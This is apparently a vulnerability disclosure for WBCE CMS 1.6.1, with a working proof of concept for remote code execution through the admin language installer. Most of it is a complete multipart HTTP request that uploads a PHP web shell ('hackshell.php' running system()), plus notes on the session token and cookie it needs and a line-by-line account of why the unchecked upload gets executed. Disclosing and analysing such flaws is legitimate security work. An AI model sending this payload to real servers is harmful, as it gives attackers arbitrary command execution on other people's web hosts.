Download WBCE CMS 1.6.1 from https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 and install it locally.
The vulnerable function is the language installer reached from http://127.0.0.1/admin/languages/index.php; its upload form is handled by /admin/languages/install.php.
An authenticated user with access to that admin page can upload a file ending in .php, which the handler includes and executes, giving remote code execution on the web server.
POC:
POST /admin/languages/install.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------382321890310304369272830113203
Content-Length: 533
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin/languages/index.php
Cookie: phpsessid-5824-sid=6rlf8lsb2ie7v7esbf7707s78a
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------382321890310304369272830113203
Content-Disposition: form-data; name="formtoken"

6992839a-84ca0426bd85508b058b9cfc930b714cc143b3e9
-----------------------------382321890310304369272830113203
Content-Disposition: form-data; name="userfile"; filename="hackshell.php"
Content-Type: application/octet-stream

<?php system('ipconfig'); ?>
-----------------------------382321890310304369272830113203
Content-Disposition: form-data; name="submit"


-----------------------------382321890310304369272830113203--

The body of the userfile part is the payload; this PoC runs system('ipconfig'), and any other PHP placed there executes the same way. The session cookie and formtoken must come from a logged-in session, and Content-Length must match the actual length of the multipart body.
Vulnerability source code analysis:
Look at the source of /admin/languages/install.php.
The file upload handling starts at line 47.
The problem is at line 78: the uploaded file is moved into place without any restriction on its extension, so a file ending in .php is accepted. Because WBCE language packs are themselves PHP files, the code then passes the 'if' test at line 82 and includes the upload with 'require', at which point any PHP inside it runs with the web server's privileges, which is the RCE. Since the uploaded file does not define what a real language pack would, the script then falls into print_error and renders an error page. After the page is refreshed at line 89, line 90 calls unlink on the uploaded file. The uploaded file therefore exists only for the duration of this one request: the code execution obtained from a single upload is one-shot, and the file cannot be kept on the server for later use. Note that unlink removes only the temporary file itself; whatever the included code already did during the require has happened by then.